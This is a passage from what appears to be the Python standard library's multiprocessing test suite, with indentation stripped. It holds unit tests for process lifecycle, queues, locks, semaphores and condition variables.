TIMEOUT1, TIMEOUT2, TIMEOUT3 = 0.82, 0.35, 1.4
else:
TIMEOUT1, TIMEOUT2, TIMEOUT3 = 0.1, 0.1, 0.1
HAVE_GETVALUE = not getattr(_multiprocessing,
'HAVE_BROKEN_SEM_GETVALUE', False)
WIN32 = (sys.platform == "win32")
from multiprocessing.connection import wait
def wait_for_handle(handle, timeout):
if timeout is not None and timeout < 0.0:
timeout = None
return wait([handle], timeout)
try:
MAXFD = os.sysconf("SC_OPEN_MAX")
except:
MAXFD = 256
# To speed up tests when using the forkserver, we can preload these:
PRELOAD = ['__main__', 'test.test_multiprocessing_forkserver']
#
# Some tests require ctypes
#
try:
from ctypes import Structure, c_int, c_double, c_longlong
except ImportError:
Structure = object
c_int = c_double = c_longlong = None
def check_enough_semaphores():
"""Check that the system supports enough semaphores to run the test."""
# minimum number of semaphores available according to POSIX
nsems_min = 256
try:
nsems = os.sysconf("SC_SEM_NSEMS_MAX")
except (AttributeError, ValueError):
# sysconf not available or setting not available
return
if nsems == -1 or nsems >= nsems_min:
return
raise unittest.SkipTest("The OS doesn't support enough semaphores "
"to run the test (required: %d)." % nsems_min)
#
# Creates a wrapper for a function which records the time it takes to finish
#
class TimingWrapper(object):
def __init__(self, func):
self.func = func
self.elapsed = None
def __call__(self, *args, **kwds):
t = time.monotonic()
try:
return self.func(*args, **kwds)
finally:
self.elapsed = time.monotonic() - t
#
# Base class for test cases
#
class BaseTestCase(object):
ALLOWED_TYPES = ('processes', 'manager', 'threads')
def assertTimingAlmostEqual(self, a, b):
if CHECK_TIMINGS:
self.assertAlmostEqual(a, b, 1)
def assertReturnsIfImplemented(self, value, func, *args):
try:
res = func(*args)
except NotImplementedError:
pass
else:
return self.assertEqual(value, res)
# For the sanity of Windows users, rather than crashing or freezing in
# multiple ways.
def __reduce__(self, *args):
raise NotImplementedError("shouldn't try to pickle a test case")
__reduce_ex__ = __reduce__
#
# Return the value of a semaphore
#
def get_value(self):
try:
return self.get_value()
except AttributeError:
try:
return self._Semaphore__value
except AttributeError:
try:
return self._value
except AttributeError:
raise NotImplementedError
#
# Testcases
#
class DummyCallable:
def __call__(self, q, c):
assert isinstance(c, DummyCallable)
q.put(5)
class _TestProcess(BaseTestCase):
ALLOWED_TYPES = ('processes', 'threads')
def test_current(self):
if self.TYPE == 'threads':
self.skipTest('test not appropriate for {}'.format(self.TYPE))
current = self.current_process()
authkey = current.authkey
self.assertTrue(current.is_alive())
self.assertTrue(not current.daemon)
self.assertIsInstance(authkey, bytes)
self.assertTrue(len(authkey) > 0)
self.assertEqual(current.ident, os.getpid())
self.assertEqual(current.exitcode, None)
def test_daemon_argument(self):
if self.TYPE == "threads":
self.skipTest('test not appropriate for {}'.format(self.TYPE))
# By default uses the current process's daemon flag.
proc0 = self.Process(target=self._test)
self.assertEqual(proc0.daemon, self.current_process().daemon)
proc1 = self.Process(target=self._test, daemon=True)
self.assertTrue(proc1.daemon)
proc2 = self.Process(target=self._test, daemon=False)
self.assertFalse(proc2.daemon)
@classmethod
def _test(cls, q, *args, **kwds):
current = cls.current_process()
q.put(args)
q.put(kwds)
q.put(current.name)
if cls.TYPE != 'threads':
q.put(bytes(current.authkey))
q.put(current.pid)
def test_process(self):
q = self.Queue(1)
e = self.Event()
args = (q, 1, 2)
kwargs = {'hello':23, 'bye':2.54}
name = 'SomeProcess'
p = self.Process(
target=self._test, args=args, kwargs=kwargs, name=name
)
p.daemon = True
current = self.current_process()
if self.TYPE != 'threads':
self.assertEqual(p.authkey, current.authkey)
self.assertEqual(p.is_alive(), False)
self.assertEqual(p.daemon, True)
self.assertNotIn(p, self.active_children())
self.assertTrue(type(self.active_children()) is list)
self.assertEqual(p.exitcode, None)
p.start()
self.assertEqual(p.exitcode, None)
self.assertEqual(p.is_alive(), True)
self.assertIn(p, self.active_children())
self.assertEqual(q.get(), args[1:])
self.assertEqual(q.get(), kwargs)
self.assertEqual(q.get(), p.name)
if self.TYPE != 'threads':
self.assertEqual(q.get(), current.authkey)
self.assertEqual(q.get(), p.pid)
p.join()
self.assertEqual(p.exitcode, 0)
self.assertEqual(p.is_alive(), False)
self.assertNotIn(p, self.active_children())
close_queue(q)
@classmethod
def _sleep_some(cls):
time.sleep(100)
@classmethod
def _test_sleep(cls, delay):
time.sleep(delay)
def _kill_process(self, meth):
if self.TYPE == 'threads':
self.skipTest('test not appropriate for {}'.format(self.TYPE))
p = self.Process(target=self._sleep_some)
p.daemon = True
p.start()
self.assertEqual(p.is_alive(), True)
self.assertIn(p, self.active_children())
self.assertEqual(p.exitcode, None)
join = TimingWrapper(p.join)
self.assertEqual(join(0), None)
self.assertTimingAlmostEqual(join.elapsed, 0.0)
self.assertEqual(p.is_alive(), True)
self.assertEqual(join(-1), None)
self.assertTimingAlmostEqual(join.elapsed, 0.0)
self.assertEqual(p.is_alive(), True)
# XXX maybe terminating too soon causes the problems on Gentoo...
time.sleep(1)
meth(p)
if hasattr(signal, 'alarm'):
# On the Gentoo buildbot waitpid() often seems to block forever.
# We use alarm() to interrupt it if it blocks for too long.
def handler(*args):
raise RuntimeError('join took too long: %s' % p)
old_handler = signal.signal(signal.SIGALRM, handler)
try:
signal.alarm(10)
self.assertEqual(join(), None)
finally:
signal.alarm(0)
signal.signal(signal.SIGALRM, old_handler)
else:
self.assertEqual(join(), None)
self.assertTimingAlmostEqual(join.elapsed, 0.0)
self.assertEqual(p.is_alive(), False)
self.assertNotIn(p, self.active_children())
p.join()
return p.exitcode
def test_terminate(self):
exitcode = self._kill_process(multiprocessing.Process.terminate)
if os.name != 'nt':
self.assertEqual(exitcode, -signal.SIGTERM)
def test_kill(self):
exitcode = self._kill_process(multiprocessing.Process.kill)
if os.name != 'nt':
self.assertEqual(exitcode, -signal.SIGKILL)
def test_cpu_count(self):
try:
cpus = multiprocessing.cpu_count()
except NotImplementedError:
cpus = 1
self.assertTrue(type(cpus) is int)
self.assertTrue(cpus >= 1)
def test_active_children(self):
self.assertEqual(type(self.active_children()), list)
p = self.Process(target=time.sleep, args=(DELTA,))
self.assertNotIn(p, self.active_children())
p.daemon = True
p.start()
self.assertIn(p, self.active_children())
p.join()
self.assertNotIn(p, self.active_children())
@classmethod
def _test_recursion(cls, wconn, id):
wconn.send(id)
if len(id) < 2:
for i in range(2):
p = cls.Process(
target=cls._test_recursion, args=(wconn, id+[i])
)
p.start()
p.join()
def test_recursion(self):
rconn, wconn = self.Pipe(duplex=False)
self._test_recursion(wconn, [])
time.sleep(DELTA)
result = []
while rconn.poll():
result.append(rconn.recv())
expected = [
[],
[0],
[0, 0],
[0, 1],
[1],
[1, 0],
[1, 1]
]
self.assertEqual(result, expected)
@classmethod
def _test_sentinel(cls, event):
event.wait(10.0)
def test_sentinel(self):
if self.TYPE == "threads":
self.skipTest('test not appropriate for {}'.format(self.TYPE))
event = self.Event()
p = self.Process(target=self._test_sentinel, args=(event,))
with self.assertRaises(ValueError):
p.sentinel
p.start()
self.addCleanup(p.join)
sentinel = p.sentinel
self.assertIsInstance(sentinel, int)
self.assertFalse(wait_for_handle(sentinel, timeout=0.0))
event.set()
p.join()
self.assertTrue(wait_for_handle(sentinel, timeout=1))
@classmethod
def _test_close(cls, rc=0, q=None):
if q is not None:
q.get()
sys.exit(rc)
def test_close(self):
if self.TYPE == "threads":
self.skipTest('test not appropriate for {}'.format(self.TYPE))
q = self.Queue()
p = self.Process(target=self._test_close, kwargs={'q': q})
p.daemon = True
p.start()
self.assertEqual(p.is_alive(), True)
# Child is still alive, cannot close
with self.assertRaises(ValueError):
p.close()
q.put(None)
p.join()
self.assertEqual(p.is_alive(), False)
self.assertEqual(p.exitcode, 0)
p.close()
with self.assertRaises(ValueError):
p.is_alive()
with self.assertRaises(ValueError):
p.join()
with self.assertRaises(ValueError):
p.terminate()
p.close()
wr = weakref.ref(p)
del p
gc.collect()
self.assertIs(wr(), None)
close_queue(q)
def test_many_processes(self):
if self.TYPE == 'threads':
self.skipTest('test not appropriate for {}'.format(self.TYPE))
sm = multiprocessing.get_start_method()
N = 5 if sm == 'spawn' else 100
# Try to overwhelm the forkserver loop with events
procs = [self.Process(target=self._test_sleep, args=(0.01,))
for i in range(N)]
for p in procs:
p.start()
for p in procs:
join_process(p)
for p in procs:
self.assertEqual(p.exitcode, 0)
procs = [self.Process(target=self._sleep_some)
for i in range(N)]
for p in procs:
p.start()
time.sleep(0.001) # let the children start...
for p in procs:
p.terminate()
for p in procs:
join_process(p)
if os.name != 'nt':
exitcodes = [-signal.SIGTERM]
if sys.platform == 'darwin':
# bpo-31510: On macOS, killing a freshly started process with
# SIGTERM sometimes kills the process with SIGKILL.
exitcodes.append(-signal.SIGKILL)
for p in procs:
self.assertIn(p.exitcode, exitcodes)
def test_lose_target_ref(self):
c = DummyCallable()
wr = weakref.ref(c)
q = self.Queue()
p = self.Process(target=c, args=(q, c))
del c
p.start()
p.join()
self.assertIs(wr(), None)
self.assertEqual(q.get(), 5)
close_queue(q)
@classmethod
def _test_child_fd_inflation(self, evt, q):
q.put(test.support.fd_count())
evt.wait()
def test_child_fd_inflation(self):
# Number of fds in child processes should not grow with the
# number of running children.
if self.TYPE == 'threads':
self.skipTest('test not appropriate for {}'.format(self.TYPE))
sm = multiprocessing.get_start_method()
if sm == 'fork':
# The fork method by design inherits all fds from the parent,
# trying to go against it is a lost battle
self.skipTest('test not appropriate for {}'.format(sm))
N = 5
evt = self.Event()
q = self.Queue()
procs = [self.Process(target=self._test_child_fd_inflation, args=(evt, q))
for i in range(N)]
for p in procs:
p.start()
try:
fd_counts = [q.get() for i in range(N)]
self.assertEqual(len(set(fd_counts)), 1, fd_counts)
finally:
evt.set()
for p in procs:
p.join()
close_queue(q)
@classmethod
def _test_wait_for_threads(self, evt):
def func1():
time.sleep(0.5)
evt.set()
def func2():
time.sleep(20)
evt.clear()
threading.Thread(target=func1).start()
threading.Thread(target=func2, daemon=True).start()
def test_wait_for_threads(self):
# A child process should wait for non-daemonic threads to end
# before exiting
if self.TYPE == 'threads':
self.skipTest('test not appropriate for {}'.format(self.TYPE))
evt = self.Event()
proc = self.Process(target=self._test_wait_for_threads, args=(evt,))
proc.start()
proc.join()
self.assertTrue(evt.is_set())
@classmethod
def _test_error_on_stdio_flush(self, evt, break_std_streams={}):
for stream_name, action in break_std_streams.items():
if action == 'close':
stream = io.StringIO()
stream.close()
else:
assert action == 'remove'
stream = None
setattr(sys, stream_name, None)
evt.set()
def test_error_on_stdio_flush_1(self):
# Check that Process works with broken standard streams
streams = [io.StringIO(), None]
streams[0].close()
for stream_name in ('stdout', 'stderr'):
for stream in streams:
old_stream = getattr(sys, stream_name)
setattr(sys, stream_name, stream)
try:
evt = self.Event()
proc = self.Process(target=self._test_error_on_stdio_flush,
args=(evt,))
proc.start()
proc.join()
self.assertTrue(evt.is_set())
self.assertEqual(proc.exitcode, 0)
finally:
setattr(sys, stream_name, old_stream)
def test_error_on_stdio_flush_2(self):
# Same as test_error_on_stdio_flush_1(), but standard streams are
# broken by the child process
for stream_name in ('stdout', 'stderr'):
for action in ('close', 'remove'):
old_stream = getattr(sys, stream_name)
try:
evt = self.Event()
proc = self.Process(target=self._test_error_on_stdio_flush,
args=(evt, {stream_name: action}))
proc.start()
proc.join()
self.assertTrue(evt.is_set())
self.assertEqual(proc.exitcode, 0)
finally:
setattr(sys, stream_name, old_stream)
@classmethod
def _sleep_and_set_event(self, evt, delay=0.0):
time.sleep(delay)
evt.set()
def check_forkserver_death(self, signum):
# bpo-31308: if the forkserver process has died, we should still
# be able to create and run new Process instances (the forkserver
# is implicitly restarted).
if self.TYPE == 'threads':
self.skipTest('test not appropriate for {}'.format(self.TYPE))
sm = multiprocessing.get_start_method()
if sm != 'forkserver':
# The fork method by design inherits all fds from the parent,
# trying to go against it is a lost battle
self.skipTest('test not appropriate for {}'.format(sm))
from multiprocessing.forkserver import _forkserver
_forkserver.ensure_running()
# First process sleeps 500 ms
delay = 0.5
evt = self.Event()
proc = self.Process(target=self._sleep_and_set_event, args=(evt, delay))
proc.start()
pid = _forkserver._forkserver_pid
os.kill(pid, signum)
# give time to the fork server to die and time to proc to complete
time.sleep(delay * 2.0)
evt2 = self.Event()
proc2 = self.Process(target=self._sleep_and_set_event, args=(evt2,))
proc2.start()
proc2.join()
self.assertTrue(evt2.is_set())
self.assertEqual(proc2.exitcode, 0)
proc.join()
self.assertTrue(evt.is_set())
self.assertIn(proc.exitcode, (0, 255))
def test_forkserver_sigint(self):
# Catchable signal
self.check_forkserver_death(signal.SIGINT)
def test_forkserver_sigkill(self):
# Uncatchable signal
if os.name != 'nt':
self.check_forkserver_death(signal.SIGKILL)
#
#
#
class _UpperCaser(multiprocessing.Process):
def __init__(self):
multiprocessing.Process.__init__(self)
self.child_conn, self.parent_conn = multiprocessing.Pipe()
def run(self):
self.parent_conn.close()
for s in iter(self.child_conn.recv, None):
self.child_conn.send(s.upper())
self.child_conn.close()
def submit(self, s):
assert type(s) is str
self.parent_conn.send(s)
return self.parent_conn.recv()
def stop(self):
self.parent_conn.send(None)
self.parent_conn.close()
self.child_conn.close()
class _TestSubclassingProcess(BaseTestCase):
ALLOWED_TYPES = ('processes',)
def test_subclassing(self):
uppercaser = _UpperCaser()
uppercaser.daemon = True
uppercaser.start()
self.assertEqual(uppercaser.submit('hello'), 'HELLO')
self.assertEqual(uppercaser.submit('world'), 'WORLD')
uppercaser.stop()
uppercaser.join()
def test_stderr_flush(self):
# sys.stderr is flushed at process shutdown (issue #13812)
if self.TYPE == "threads":
self.skipTest('test not appropriate for {}'.format(self.TYPE))
testfn = test.support.TESTFN
self.addCleanup(test.support.unlink, testfn)
proc = self.Process(target=self._test_stderr_flush, args=(testfn,))
proc.start()
proc.join()
with open(testfn, 'r') as f:
err = f.read()
# The whole traceback was printed
self.assertIn("ZeroDivisionError", err)
self.assertIn("test_multiprocessing.py", err)
self.assertIn("1/0 # MARKER", err)
@classmethod
def _test_stderr_flush(cls, testfn):
fd = os.open(testfn, os.O_WRONLY | os.O_CREAT | os.O_EXCL)
sys.stderr = open(fd, 'w', closefd=False)
1/0 # MARKER
@classmethod
def _test_sys_exit(cls, reason, testfn):
fd = os.open(testfn, os.O_WRONLY | os.O_CREAT | os.O_EXCL)
sys.stderr = open(fd, 'w', closefd=False)
sys.exit(reason)
def test_sys_exit(self):
# See Issue 13854
if self.TYPE == 'threads':
self.skipTest('test not appropriate for {}'.format(self.TYPE))
testfn = test.support.TESTFN
self.addCleanup(test.support.unlink, testfn)
for reason in (
[1, 2, 3],
'ignore this',
):
p = self.Process(target=self._test_sys_exit, args=(reason, testfn))
p.daemon = True
p.start()
join_process(p)
self.assertEqual(p.exitcode, 1)
with open(testfn, 'r') as f:
content = f.read()
self.assertEqual(content.rstrip(), str(reason))
os.unlink(testfn)
for reason in (True, False, 8):
p = self.Process(target=sys.exit, args=(reason,))
p.daemon = True
p.start()
join_process(p)
self.assertEqual(p.exitcode, reason)
#
#
#
def queue_empty(q):
if hasattr(q, 'empty'):
return q.empty()
else:
return q.qsize() == 0
def queue_full(q, maxsize):
if hasattr(q, 'full'):
return q.full()
else:
return q.qsize() == maxsize
class _TestQueue(BaseTestCase):
@classmethod
def _test_put(cls, queue, child_can_start, parent_can_continue):
child_can_start.wait()
for i in range(6):
queue.get()
parent_can_continue.set()
def test_put(self):
MAXSIZE = 6
queue = self.Queue(maxsize=MAXSIZE)
child_can_start = self.Event()
parent_can_continue = self.Event()
proc = self.Process(
target=self._test_put,
args=(queue, child_can_start, parent_can_continue)
)
proc.daemon = True
proc.start()
self.assertEqual(queue_empty(queue), True)
self.assertEqual(queue_full(queue, MAXSIZE), False)
queue.put(1)
queue.put(2, True)
queue.put(3, True, None)
queue.put(4, False)
queue.put(5, False, None)
queue.put_nowait(6)
# the values may be in buffer but not yet in pipe so sleep a bit
time.sleep(DELTA)
self.assertEqual(queue_empty(queue), False)
self.assertEqual(queue_full(queue, MAXSIZE), True)
put = TimingWrapper(queue.put)
put_nowait = TimingWrapper(queue.put_nowait)
self.assertRaises(pyqueue.Full, put, 7, False)
self.assertTimingAlmostEqual(put.elapsed, 0)
self.assertRaises(pyqueue.Full, put, 7, False, None)
self.assertTimingAlmostEqual(put.elapsed, 0)
self.assertRaises(pyqueue.Full, put_nowait, 7)
self.assertTimingAlmostEqual(put_nowait.elapsed, 0)
self.assertRaises(pyqueue.Full, put, 7, True, TIMEOUT1)
self.assertTimingAlmostEqual(put.elapsed, TIMEOUT1)
self.assertRaises(pyqueue.Full, put, 7, False, TIMEOUT2)
self.assertTimingAlmostEqual(put.elapsed, 0)
self.assertRaises(pyqueue.Full, put, 7, True, timeout=TIMEOUT3)
self.assertTimingAlmostEqual(put.elapsed, TIMEOUT3)
child_can_start.set()
parent_can_continue.wait()
self.assertEqual(queue_empty(queue), True)
self.assertEqual(queue_full(queue, MAXSIZE), False)
proc.join()
close_queue(queue)
@classmethod
def _test_get(cls, queue, child_can_start, parent_can_continue):
child_can_start.wait()
#queue.put(1)
queue.put(2)
queue.put(3)
queue.put(4)
queue.put(5)
parent_can_continue.set()
def test_get(self):
queue = self.Queue()
child_can_start = self.Event()
parent_can_continue = self.Event()
proc = self.Process(
target=self._test_get,
args=(queue, child_can_start, parent_can_continue)
)
proc.daemon = True
proc.start()
self.assertEqual(queue_empty(queue), True)
child_can_start.set()
parent_can_continue.wait()
time.sleep(DELTA)
self.assertEqual(queue_empty(queue), False)
# Hangs unexpectedly, remove for now
#self.assertEqual(queue.get(), 1)
self.assertEqual(queue.get(True, None), 2)
self.assertEqual(queue.get(True), 3)
self.assertEqual(queue.get(timeout=1), 4)
self.assertEqual(queue.get_nowait(), 5)
self.assertEqual(queue_empty(queue), True)
get = TimingWrapper(queue.get)
get_nowait = TimingWrapper(queue.get_nowait)
self.assertRaises(pyqueue.Empty, get, False)
self.assertTimingAlmostEqual(get.elapsed, 0)
self.assertRaises(pyqueue.Empty, get, False, None)
self.assertTimingAlmostEqual(get.elapsed, 0)
self.assertRaises(pyqueue.Empty, get_nowait)
self.assertTimingAlmostEqual(get_nowait.elapsed, 0)
self.assertRaises(pyqueue.Empty, get, True, TIMEOUT1)
self.assertTimingAlmostEqual(get.elapsed, TIMEOUT1)
self.assertRaises(pyqueue.Empty, get, False, TIMEOUT2)
self.assertTimingAlmostEqual(get.elapsed, 0)
self.assertRaises(pyqueue.Empty, get, timeout=TIMEOUT3)
self.assertTimingAlmostEqual(get.elapsed, TIMEOUT3)
proc.join()
close_queue(queue)
@classmethod
def _test_fork(cls, queue):
for i in range(10, 20):
queue.put(i)
# note that at this point the items may only be buffered, so the
# process cannot shutdown until the feeder thread has finished
# pushing items onto the pipe.
def test_fork(self):
# Old versions of Queue would fail to create a new feeder
# thread for a forked process if the original process had its
# own feeder thread. This test checks that this no longer
# happens.
queue = self.Queue()
# put items on queue so that main process starts a feeder thread
for i in range(10):
queue.put(i)
# wait to make sure thread starts before we fork a new process
time.sleep(DELTA)
# fork process
p = self.Process(target=self._test_fork, args=(queue,))
p.daemon = True
p.start()
# check that all expected items are in the queue
for i in range(20):
self.assertEqual(queue.get(), i)
self.assertRaises(pyqueue.Empty, queue.get, False)
p.join()
close_queue(queue)
def test_qsize(self):
q = self.Queue()
try:
self.assertEqual(q.qsize(), 0)
except NotImplementedError:
self.skipTest('qsize method not implemented')
q.put(1)
self.assertEqual(q.qsize(), 1)
q.put(5)
self.assertEqual(q.qsize(), 2)
q.get()
self.assertEqual(q.qsize(), 1)
q.get()
self.assertEqual(q.qsize(), 0)
close_queue(q)
@classmethod
def _test_task_done(cls, q):
for obj in iter(q.get, None):
time.sleep(DELTA)
q.task_done()
def test_task_done(self):
queue = self.JoinableQueue()
workers = [self.Process(target=self._test_task_done, args=(queue,))
for i in range(4)]
for p in workers:
p.daemon = True
p.start()
for i in range(10):
queue.put(i)
queue.join()
for p in workers:
queue.put(None)
for p in workers:
p.join()
close_queue(queue)
def test_no_import_lock_contention(self):
with test.support.temp_cwd():
module_name = 'imported_by_an_imported_module'
with open(module_name + '.py', 'w') as f:
f.write("""if 1:
import multiprocessing
q = multiprocessing.Queue()
q.put('knock knock')
q.get(timeout=3)
q.close()
del q
""")
with test.support.DirsOnSysPath(os.getcwd()):
try:
__import__(module_name)
except pyqueue.Empty:
self.fail("Probable regression on import lock contention;"
" see Issue #22853")
def test_timeout(self):
q = multiprocessing.Queue()
start = time.monotonic()
self.assertRaises(pyqueue.Empty, q.get, True, 0.200)
delta = time.monotonic() - start
# bpo-30317: Tolerate a delta of 100 ms because of the bad clock
# resolution on Windows (usually 15.6 ms). x86 Windows7 3.x once
# failed because the delta was only 135.8 ms.
self.assertGreaterEqual(delta, 0.100)
close_queue(q)
def test_queue_feeder_donot_stop_onexc(self):
# bpo-30414: verify feeder handles exceptions correctly
if self.TYPE != 'processes':
self.skipTest('test not appropriate for {}'.format(self.TYPE))
class NotSerializable(object):
def __reduce__(self):
raise AttributeError
with test.support.captured_stderr():
q = self.Queue()
q.put(NotSerializable())
q.put(True)
self.assertTrue(q.get(timeout=TIMEOUT))
close_queue(q)
with test.support.captured_stderr():
# bpo-33078: verify that the queue size is correctly handled
# on errors.
q = self.Queue(maxsize=1)
q.put(NotSerializable())
q.put(True)
try:
self.assertEqual(q.qsize(), 1)
except NotImplementedError:
# qsize is not available on all platform as it
# relies on sem_getvalue
pass
# bpo-30595: use a timeout of 1 second for slow buildbots
self.assertTrue(q.get(timeout=1.0))
# Check that the size of the queue is correct
self.assertTrue(q.empty())
close_queue(q)
def test_queue_feeder_on_queue_feeder_error(self):
# bpo-30006: verify feeder handles exceptions using the
# _on_queue_feeder_error hook.
if self.TYPE != 'processes':
self.skipTest('test not appropriate for {}'.format(self.TYPE))
class NotSerializable(object):
"""Mock unserializable object"""
def __init__(self):
self.reduce_was_called = False
self.on_queue_feeder_error_was_called = False
def __reduce__(self):
self.reduce_was_called = True
raise AttributeError
class SafeQueue(multiprocessing.queues.Queue):
"""Queue with overloaded _on_queue_feeder_error hook"""
@staticmethod
def _on_queue_feeder_error(e, obj):
if (isinstance(e, AttributeError) and
isinstance(obj, NotSerializable)):
obj.on_queue_feeder_error_was_called = True
not_serializable_obj = NotSerializable()
# The captured_stderr reduces the noise in the test report
with test.support.captured_stderr():
q = SafeQueue(ctx=multiprocessing.get_context())
q.put(not_serializable_obj)
# Verify that q is still functioning correctly
q.put(True)
self.assertTrue(q.get(timeout=1.0))
# Assert that the serialization and the hook have been called correctly
self.assertTrue(not_serializable_obj.reduce_was_called)
self.assertTrue(not_serializable_obj.on_queue_feeder_error_was_called)
#
#
#
class _TestLock(BaseTestCase):
def test_lock(self):
lock = self.Lock()
self.assertEqual(lock.acquire(), True)
self.assertEqual(lock.acquire(False), False)
self.assertEqual(lock.release(), None)
self.assertRaises((ValueError, threading.ThreadError), lock.release)
def test_rlock(self):
lock = self.RLock()
self.assertEqual(lock.acquire(), True)
self.assertEqual(lock.acquire(), True)
self.assertEqual(lock.acquire(), True)
self.assertEqual(lock.release(), None)
self.assertEqual(lock.release(), None)
self.assertEqual(lock.release(), None)
self.assertRaises((AssertionError, RuntimeError), lock.release)
def test_lock_context(self):
with self.Lock():
pass
class _TestSemaphore(BaseTestCase):
def _test_semaphore(self, sem):
self.assertReturnsIfImplemented(2, get_value, sem)
self.assertEqual(sem.acquire(), True)
self.assertReturnsIfImplemented(1, get_value, sem)
self.assertEqual(sem.acquire(), True)
self.assertReturnsIfImplemented(0, get_value, sem)
self.assertEqual(sem.acquire(False), False)
self.assertReturnsIfImplemented(0, get_value, sem)
self.assertEqual(sem.release(), None)
self.assertReturnsIfImplemented(1, get_value, sem)
self.assertEqual(sem.release(), None)
self.assertReturnsIfImplemented(2, get_value, sem)
def test_semaphore(self):
sem = self.Semaphore(2)
self._test_semaphore(sem)
self.assertEqual(sem.release(), None)
self.assertReturnsIfImplemented(3, get_value, sem)
self.assertEqual(sem.release(), None)
self.assertReturnsIfImplemented(4, get_value, sem)
def test_bounded_semaphore(self):
sem = self.BoundedSemaphore(2)
self._test_semaphore(sem)
# Currently fails on OS/X
#if HAVE_GETVALUE:
# self.assertRaises(ValueError, sem.release)
# self.assertReturnsIfImplemented(2, get_value, sem)
def test_timeout(self):
if self.TYPE != 'processes':
self.skipTest('test not appropriate for {}'.format(self.TYPE))
sem = self.Semaphore(0)
acquire = TimingWrapper(sem.acquire)
self.assertEqual(acquire(False), False)
self.assertTimingAlmostEqual(acquire.elapsed, 0.0)
self.assertEqual(acquire(False, None), False)
self.assertTimingAlmostEqual(acquire.elapsed, 0.0)
self.assertEqual(acquire(False, TIMEOUT1), False)
self.assertTimingAlmostEqual(acquire.elapsed, 0)
self.assertEqual(acquire(True, TIMEOUT2), False)
self.assertTimingAlmostEqual(acquire.elapsed, TIMEOUT2)
self.assertEqual(acquire(timeout=TIMEOUT3), False)
self.assertTimingAlmostEqual(acquire.elapsed, TIMEOUT3)
class _TestCondition(BaseTestCase):
@classmethod
def f(cls, cond, sleeping, woken, timeout=None):
cond.acquire()
sleeping.release()
cond.wait(timeout)
woken.release()
cond.release()
def assertReachesEventually(self, func, value):
for i in range(10):
try:
if func() == value:
break
except NotImplementedError:
break
time.sleep(DELTA)
time.sleep(DELTA)
self.assertReturnsIfImplemented(value, func)
def check_invariant(self, cond):
# this is only supposed to succeed when there are no sleepers
if self.TYPE == 'processes':
try:
sleepers = (cond._sleeping_count.get_value() -
cond._woken_count.get_value())
self.assertEqual(sleepers, 0)
self.assertEqual(cond._wait_semaphore.get_value(), 0)
except NotImplementedError:
pass
def test_notify(self):
cond = self.Condition()
sleeping = self.Semaphore(0)
woken = self.Semaphore(0)
p = self.Process(target=self.f, args=(cond, sleeping, woken))
p.daemon = True
p.start()
self.addCleanup(p.join)
p = threading.Thread(target=self.f, args=(cond, sleeping, woken))
p.daemon = True
p.start()
self.addCleanup(p.join)
# wait for both children to start sleeping
sleeping.acquire()
sleeping.acquire()
# check no process/thread has woken up
time.sleep(DELTA)
self.assertReturnsIfImplemented(0, get_value, woken)
# wake up one process/thread
cond.acquire()
cond.notify()
cond.release()
# check one process/thread has woken up
time.sleep(DELTA)
self.assertReturnsIfImplemented(1, get_value, woken)
# wake up another
cond.acquire()
cond.notify()
cond.release()
# check other has woken up
time.sleep(DELTA)
self.assertReturnsIfImplemented(2, get_value, woken)
# check state is not mucked up
self.check_invariant(cond)
p.join()
def test_notify_all(self):
cond = self.Condition()
sleeping = self.Semaphore(0)
woken = self.Semaphore(0)
# start some threads/processes which will timeout
for i in range(3):
p = self.Process(target=self.f,
args=(cond, sleeping, woken, TIMEOUT1))
p.daemon = True
p.start()
self.addCleanup(p.join)
t = threading.Thread(target=self.f,
args=(cond, sleeping, woken, TIMEOUT1))
t.daemon = True
t.start()
self.addCleanup(t.join)
# wait for them all to sleep
for i in range(6):
sleeping.acquire()
# check they have all timed out
for i in range(6):
woken.acquire()
self.assertReturnsIfImplemented(0, get_value, woken)
# check state is not mucked up
self.check_invariant(cond)
# start some more threads/processes
for i in range(3):
p = self.Process(target=self.f, args=(cond, sleeping, woken))
p.daemon = True
p.start()
self.addCleanup(p.join)
t = threading.Thread(target=self.f, args=(cond, sleeping, woken))
t.daemon = True
t.start()
self.addCleanup(t.join)
# wait for them to all sleep
for i in range(6):
sleeping.acquire()
# check no process/thread has woken up
time.sleep(DELTA)
self.assertReturnsIfImplemented(0, get_value, woken)
# wake them all up
cond.acquire()
cond.notify_all()
cond.release()
# check they have all woken
self.assertReachesEventually(lambda: get_value(woken), 6)
# check state is not mucked up
self.check_invariant(cond)
def test_notify_n(self):
cond = self.Condition()
sleeping = self.Semaphore(0)
woken = self.Semaphore(0)
# start some threads/processes
for i in range(3):
p = self.Process(target=self.f, args=(cond, sleeping, woken))
p.daemon = True
p.start()
self.addCleanup(p.join)
t = threading.Thread(target=self.f, args=(cond, sleeping, woken))
t.daemon = True
t.start()
self.addCleanup(t.join)
# wait for them to all sleep
for i in range(6):
sleeping.acquire()
# check no process/thread has woken up
time.sleep(DELTA)
self.assertReturnsIfImplemented(0, get_value, woken)
# wake some of them up
cond.acquire()
cond.notify(n=2)
cond.release()
# check 2 have woken
self.assertReachesEventually(lambda: get_value(woken), 2)
# wake the rest of them
cond.acquire()
cond.notify(n=4)
cond.release()
self.assertReachesEventually(lambda: get_value(woken), 6)
# doesn't do anything more
cond.acquire()
cond.notify(n=3)
cond.release()
self.assertReturnsIfImplemented(6, get_value, woken)
# check state is not mucked up
self.check_invariant(cond)
def test_timeout(self):
cond = self.Condition()
wait = TimingWrapper(cond.wait)
cond.acquire()
res = wait(TIMEOUT1)
cond.release()
self.assertEqual(res, False)
self.assertTimingAlmostEqual(wait.elapsed, TIMEOUT1)
@classmethod
def _test_waitfor_f(cls, cond, state):
with cond:
state.value = 0
cond.notify()
result = cond.wait_for(lambda : state.value==4)
if not result or state.value != 4:
sys.exit(1)
@unittest.skipUnless(HAS_SHAREDCTYPES, 'needs sharedctypes')
def test_waitfor(self):
# based on test in test/lock_tests.py
cond = self.Condition()
state = self.Value('i', -1)
p = self.Process(target=self._test_waitfor_f, args=(cond, state))
p.daemon = True
p.start()
with cond:
result = cond.wait_for(lambda : state.value==0)
self.assertTrue(result)
self.assertEqual(state.value, 0)
for i in range(4):
time.sleep(0.01)
with cond:
state.value += 1
cond.notify()
join_process(p)
self.assertEqual(p.exitcode, 0)
@classmethod
def _test_waitfor_timeout_f(cls, cond, state, success, sem):
sem.release()
with cond:
expected = 0.1
dt = time.monotonic()
result = cond.wait_for(lambda : state.value==4, timeout=expected)
dt = time.monotonic() - dt
# borrow logic in assertTimeout() from test/lock_tests.py
if not result and expected * 0.6 < dt < expected * 10.0:
success.value = True
